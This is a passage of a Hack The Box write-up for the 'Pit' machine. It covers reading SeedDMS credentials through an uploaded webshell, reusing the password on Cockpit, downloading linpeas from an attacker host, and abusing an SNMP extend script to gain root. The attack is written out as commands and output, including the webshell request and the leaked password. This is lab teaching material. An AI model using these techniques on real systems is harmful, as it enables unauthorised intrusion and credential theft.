mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx:x:992:988:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-wsinstance:x:991:987:User for cockpit-ws instances:/nonexisting:/sbin/nologin
rngd:x:990:986:Random Number Generator Daemon:/var/lib/rngd:/sbin/nologin
</pre>%

Now, let's see what we can do here. We can use this to check on files we have access to, like SeedDMS's settings.xml file as it contains the SeedDMS configurations including how to authenticate to it.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/31/1.php?cmd=cat+../../../conf/settings.xml' \
    -H 'Host: dms-pit.htb' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'X-Requested-With: XMLHttpRequest' \
    -b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:44:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 11944
 
<pre><?xml version="1.0" encoding="UTF-8"?>
<configuration>
...
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>
    <!-- smtpServer: SMTP Server hostname
       - smtpPort: SMTP Server port
       - smtpSendFrom: Send from
    -->    
    <smtp smtpServer="localhost" smtpPort="25" smtpSendFrom="seeddms@localhost" smtpUser="" smtpPassword=""/>    
  </system>
... 
  </advanced>
 
<extensions><extension name="example"/></extensions></configuration>
</pre>%

And we in fact found some database credentials, but we have no way to test these at the moment as MySQL is not accessible but only to localhost.

At the moment, we have a confirmed user in the host, 'michelle', and a password in cleartext. We can test and see if the password was used on the database following the lazy admin approach against https://pit.htb:9090 as it has a login page found earlier. Since this application is Cockpit, a server administration tool sponsored by Red Hat, we can try these credentials there.

Once we do, we are able to login. This is the attempt we decided to go for as the credentials cannot be used in SSH as it requires the use of SSH keys. While digging through Cockpit, each user can add their own SSH key, so we must do that unless we decide to rely on the web-based terminal Cockpit provides.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh michelle@pit.htb -i ~/.ssh/id_rsa
Web console: https://pit.htb:9090/
 
Last login: Mon Sep 20 00:56:13 2021
[michelle@pit ~]$ id
uid=1000(michelle) gid=1000(michelle) groups=1000(michelle) context=user_u:user_r:user_t:s0

Finally we are in and we got user!

[michelle@pit ~]$ cat user.txt 
937041********************db1de1

Privilege Escalation

At the moment, let's remember we have the following credentials: michelle:ied^ieY6xoquu

Let's try to check the system and use linPEAS:

[michelle@pit ~]$ cd /tmp
[michelle@pit tmp]$ which curl
/usr/bin/curl
[michelle@pit tmp]$ curl -sL http://10.10.14.203:8000/linpeas.sh --output linpeas.sh
[michelle@pit tmp]$ ls
linpeas.sh
systemd-private-3902301ae9d84207995016ea767cc5e9-php-fpm.service-lCUtOS

LINPEAS

[michelle@pit tmp]$ ./linpeas.sh
 
 
                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
 
      /---------------------------------------------------------------------------\
      |                             Do you like PEASS?                            |
      |---------------------------------------------------------------------------| 
      |         Become a Patreon    :     https://www.patreon.com/peass           |
      |         Follow on Twitter   :     @carlospolopm                           |
      |         Respect on HTB      :     SirBroccoli & makikvues                 |
      |---------------------------------------------------------------------------|
      |                                 Thank you!                                |
      \---------------------------------------------------------------------------/
        linpeas-ng by carlospolop
 
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
 
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username
 
 Starting linpeas. Caching Writable Folders...
...
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
# file: /usr/local/monitoring
USER   root      rwx     
user   michelle  -wx     
GROUP  root      rwx     
mask             rwx     
other            ---     
 
...

After inspecting what linPEAS found, we notice /usr/local/monitoring has an ACL set where michelle only has write and execute rights.

If we recall when we inspected the SNMP dump it gives us something that might be related: .1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"

Let's see what both the monitoring directory and monitor are about:

[michelle@pit tmp]$ ls -ltr /usr/local/monitoring/
ls: cannot open directory '/usr/local/monitoring/': Permission denied
[michelle@pit tmp]$ ls -ltr /usr/bin/monitor 
-rwxr--r--. 1 root root 88 Apr 18  2020 /usr/bin/monitor
[michelle@pit tmp]$ file /usr/bin/monitor 
/usr/bin/monitor: Bourne-Again shell script, ASCII text executable
[michelle@pit etc]$ cat /usr/bin/monitor 
#!/bin/bash
 
for script in /usr/local/monitoring/check*sh
do
    /bin/bash $script
done

Looks like /usr/bin/monitor checks for scripts in the monitoring directory and runs each one. This means we can create a script in this directory and try to run it, but the problem is we cannot as monitor can be execute by root. If we create a script, how can we get it to run if we cannot use /usr/bin/monitor?

According to https://mogwailabs.de/en/blog/2019/10/abusing-linux-snmp-for-rce/, there are ways to abuse snmp. After looking at the system and what we can do with the user, we can only think of going back at snmp since it showed us /usr/bin/monitor.

Let's insert our private key into a check*.sh script for monitor to run and trigger the script using snmpwalk. First, we must install snmp-mibs-downloader so it looks at all the local mibs and uses them.

SNMPWALK

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmpwalk -m +MY-MIB -v2c -c public pit.htb nsExtendObjects
MIB search path: /home/jxberrios/.snmp/mibs:/usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf
Cannot find module (MY-MIB): At line 1 in (none)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."monitoring" = STRING: Memory usage
              total        used        free      shared  buff/cache   available
Mem:          3.8Gi       474Mi       3.1Gi       8.0Mi       298Mi       3.2Gi
Swap:         1.9Gi          0B       1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
 
                Labeling   MLS/       MLS/
SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles
 
guest_u         user       s0         s0                             guest_r
root            user       s0         s0-s0:c0.c1023                 staff_r sysadm_r system_r unconfined_r
staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm_r unconfined_r
sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
system_u        user       s0         s0-s0:c0.c1023                 system_r unconfined_r
unconfined_u    user       s0         s0-s0:c0.c1023                 system_r unconfined_r
user_u          user       s0         s0                             user_r
xguest_u        user       s0         s0                             xguest_r
login
 
Login Name           SELinux User         MLS/MCS Range        Service
 
__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
System uptime
 22:23:42 up 13 min,  2 users,  load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."monitoring" = INTEGER: 31
NET-SNMP-EXTEND-MIB::nsExtendResult."monitoring" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Memory usage
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING:               total        used        free      shared  buff/cache   available
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".3 = STRING: Mem:          3.8Gi       474Mi       3.1Gi       8.0Mi       298Mi       3.2Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".4 = STRING: Swap:         1.9Gi          0B       1.9Gi
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".5 = STRING: Database status
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".6 = STRING: OK - Connection to database successful.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".7 = STRING: System release info
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".8 = STRING: CentOS Linux release 8.3.2011
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".9 = STRING: SELinux Settings
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".10 = STRING: user
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".11 = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".12 = STRING:                 Labeling   MLS/       MLS/                          
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".13 = STRING: SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".14 = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".15 = STRING: guest_u         user       s0         s0                             guest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".16 = STRING: root            user       s0         s0-s0:c0.c1023                 staff_r sysadm_r system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".17 = STRING: staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".18 = STRING: sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".19 = STRING: system_u        user       s0         s0-s0:c0.c1023                 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".20 = STRING: unconfined_u    user       s0         s0-s0:c0.c1023                 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".21 = STRING: user_u          user       s0         s0                             user_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".22 = STRING: xguest_u        user       s0         s0                             xguest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".23 = STRING: login
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: Login Name           SELinux User         MLS/MCS Range        Service
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING: 
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: __default__          unconfined_u         s0-s0:c0.c1023       *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: michelle             user_u               s0                   *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".29 = STRING: root                 unconfined_u         s0-s0:c0.c1023       *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".30 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = STRING:  22:23:42 up 13 min,  2 users,  load average: 1.18, 0.59, 0.33
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".31 = No more variables left in this MIB View (It is past the end of the MIB tree)

Now let's try to SSH as root.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> ssh root@pit.htb -i ~/.ssh/id_rsa                         
Web console: https://pit.htb:9090/
 
Last login: Mon Jul 26 09:15:10 2021
[root@pit ~]# id; whoami
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
root

AND we are in!! Let's get the flag!

[root@pit ~]# cat root.txt 
fb7aeb********************7b53f4

PreviousOpenKeyS NextIntelligence

Last updated 4 years ago

Was this helpful?